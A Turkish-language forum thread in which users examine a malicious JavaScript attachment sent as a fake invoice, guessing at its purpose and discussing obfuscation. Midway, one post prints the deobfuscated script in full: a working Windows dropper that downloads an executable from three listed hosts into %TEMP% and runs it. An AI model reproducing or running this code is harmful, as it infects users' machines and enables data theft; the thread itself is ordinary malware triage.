Js İle Virüs Yazmışlar
-
Merhabalar, Az önce bir mail aldım. Adamlar fatura diye ittirmeye çalışmış. Zip'in içine js'yi çakmışlar. Function isimleri wgj223, wgj224, wgj225 diye gidiyor. Sanırım cryptolocker gibi birşey.
Bakmak isteyenler için: http://paste.ubuntu.com/11792971/
Gelen mail: http://prntscr.com/7mosrz
-
sen zaten yazmıyor muydun? winapi kullanımını sordum hatta cevap vermedim. bunu sen yazdın anlamında demedim , şaşırmana şaşırdım
-
https://www.virustotal.com Yükle tüm antivirüsler tanısın hocam.
-
KizilS bunu yazdı
sen zaten yazmıyor muydun? winapi kullanımını sordum hatta cevap vermedim. bunu sen yazdın anlamında demedim , şaşırmana şaşırdım
Ben yazıyordum da böyle şeyler yazmadım ya, gayet insancıl ve seo için şeyler yazdım :) winapi için sana pm atıcam :)
mkyb bunu yazdıhttps://www.virustotal.com Yükle tüm antivirüsler tanısın hocam.
Yolladım hocam, sanal makinada çalıştırıcam muhtemelen cryptolocker
-
Cryptolocaker dan ziyade reklam gibi bir şey. yazı çıkar büyük ihtimalle.
-
SkynetX bunu yazdı
Cryptolocaker dan ziyade reklam gibi bir şey. yazı çıkar büyük ihtimalle.
Aynen hocam reklam, muhtemelen görüntüleme üstüne para veren bir firmada kullanıyorlar. Get'lerde gif dosyaları iniyor zaten.
Kodun açılmış hali : http://prntscr.com/7mp4ag
-
Programın kaynak kodunu böyle anlamsız anlamsız functionlara bölüp,
karşı tarafta iş yaptırma tekniğinin adı nedir ?
-
SerYolcu bunu yazdı
Programın kaynak kodunu böyle anlamsız anlamsız functionlara bölüp,
karşı tarafta iş yaptırma tekniğinin adı nedir ?
obfuscate
-
jfunction dl(fr) { var b = "64.239.115.111 dickinsonwrestlingclub.com idsecurednow.com".split(" "); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe"; var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+stroke, false); xo.send(); } catch (er) { }; if (dn == 1) break; } }; dl(4091); dl(52); dl(2543);
downloader çıktı iyimi
-
babayarisi bunu yazdı
jfunction dl(fr) { var b = "64.239.115.111 dickinsonwrestlingclub.com idsecurednow.com".split(" ");
downloader çıktı iyimi
Bu virüsü nasıl böyle okunabilir hale getirdin ?
-
Downloader demeye gelmiştim yazmış arkadaşlar. Js içine gömüp genelde filezilla ve browserdan veri çekiyorlar böyle.